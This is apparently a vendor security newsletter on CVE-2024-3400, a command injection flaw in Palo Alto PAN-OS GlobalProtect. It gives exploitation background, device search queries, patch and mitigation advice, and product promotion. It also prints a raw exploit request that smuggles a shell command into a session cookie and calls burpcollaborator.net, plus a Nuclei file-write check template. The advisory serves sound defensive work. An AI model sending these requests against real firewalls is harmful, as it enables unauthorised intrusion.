Analysis of CVE-2024-3400 in Palo Alto Firewalls initial access and exploitation

Welcome back to Phoenix Security | ASPM newsletter

A recent discovery, on April 10 2024, by a research group has identified zero-day exploitation of a vulnerability found within the GlobalProtect feature of Palo Alto Networks PAN-OS at one of its network security monitoring (NSM) customers, recently published by CISA in CISA KEV. Check this article on the details for CVE-2024-3400 and how to track remediation.

(note some part of this article are AI-generated based on the content from Phoenix Security to accelerate response to this vulnerability)

Exploiting the vulnerability, now named under the alias UTA0218, the threat actor could remotely exploit the firewall device, create a reverse shell, and download further tools onto the device. This is an entry point for future exploitation and penetration of the network.?

Exploitation of CVE-2024-3400: What You Need to Know

CVE-2024-3400 is an unpatched zero-day vulnerability within the GlobalProtect feature of Palo Alto Networks' firewall systems. Notably present in PAN-OS 10.2, 11.0, and 11.1, it becomes a gateway for threat actors, like UTA0218, to execute remote code, create reverse shells, and, more alarmingly, lay the groundwork for deeper network penetration.

With patches slated for release by April 14, 2024, the race against time is critical. For detailed insights into the nature of CVE-2024-3400 and remediation strategies, please visit our this article.

Distribution

To get the latest update, those are the strings to search (thanks, Daniel Card )

Shodan (41,662): http.html_hash:-1303565546

Censys (41,163): services.http.response.body_hash="sha1:28f1cf539f855fff3400f6199f8912908f51e1e1"

Current distribution might include several honeypots.

• United States17,062
• United Kingdom1,583
• Canada1,445
• Germany1,434
• India1,178

As per The Shadowserver Foundation there is evidence of exploitation

Timeline for exploitation

Check out the following for full details : https://dashboard.shadowserver.org/statistics/iot-devices/map/?day=2024-04-15&vendor=palo+alto+networks&model=globalprotect&geo=all&data_set=count&scale=log

Check for vulnerability:

Test for https://github.com/0x0d3ad/CVE-2024-3400

You can use Burp Collaborator for rce check

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`hostname${IFS}burpcollaborator.net `;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0        

Replace base url with your URL

id: palo-alto-networks-pan-os-command-injection
info:
  name: Palo Alto Networks PAN-OS Command Injection Vulnerability
  author: generated with pdteam AI
  severity: Critical

http:
  - method: POST
    path:
      - "{{BaseURL}}/ssl-vpn/hipreport.esp"
    headers:
      Cookie: "SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;"
      Connection: "close"
      Content-Type: "application/x-www-form-urlencoded"
      Content-Length: "0"
    matchers:
      - type: status
        status:
          - 200

  - method: GET
    path:
      - "{{BaseURL}}/global-protect/portal/images/poc.txt"
    matchers:
      - type: status
        status:
          - 403        

References

• https://security.paloaltonetworks.com/CVE-2024-3400
• https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
• https://github.com/h4x0r-dz/CVE-2024-3400

Patch/Fix CVE-2024-3400 for Palo Alto

Palo Alto releases a patch for PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, and in all later PAN-OS versions.

Hotfixes for other commonly deployed maintenance releases will also be available to address this issue. Please see the details below for ETAs regarding the upcoming hotfixes.

Workarounds and Mitigation Measures

Palo Alto Networks customers equipped with Threat Prevention subscriptions are not defenseless. By activating Threat ID 95187, they can fortify their networks against CVE-2024-3400 exploits. Additional details on safeguarding the GlobalProtect interface are available here.

For those currently unable to deploy Threat Prevention mitigations, disabling device telemetry presents a viable stopgap measure until system upgrades can be performed. Guidance on this process can be found here.

Free Assessment and Remediation Guidance

To grasp the full scope of CVE-2024-3400's impact on your network and to structure a precise remediation campaign, do not hesitate to contact us for a free assessment and guidance on remediation actions.

How Phoenix Can Help

Detecting, Scheduling remediation, and prioritizing CVE-2024-3400, Phoenix Security emerges as an indispensable ally. By leveraging Unified Vulnerability Management (UVM) and Advanced Security Posture Management (ASPM), Phoenix enables organizations to detect, prioritize, and schedule comprehensive remediation campaigns. These powerful tools not only identify but also help manage the repair process across the organizational network, offering granular insights and real-time progress tracking through intuitive dashboards.

Check the latest threats and vulnerability analysis

Stay ahead of the threat. Click here to learn how Phoenix can secure your network against CVE-2024-3400 and similar cybersecurity vulnerabilities.

For more information on CVE-2024-3400 and to schedule your free assessment, visit our detailed guide on remediation steps and protection strategies.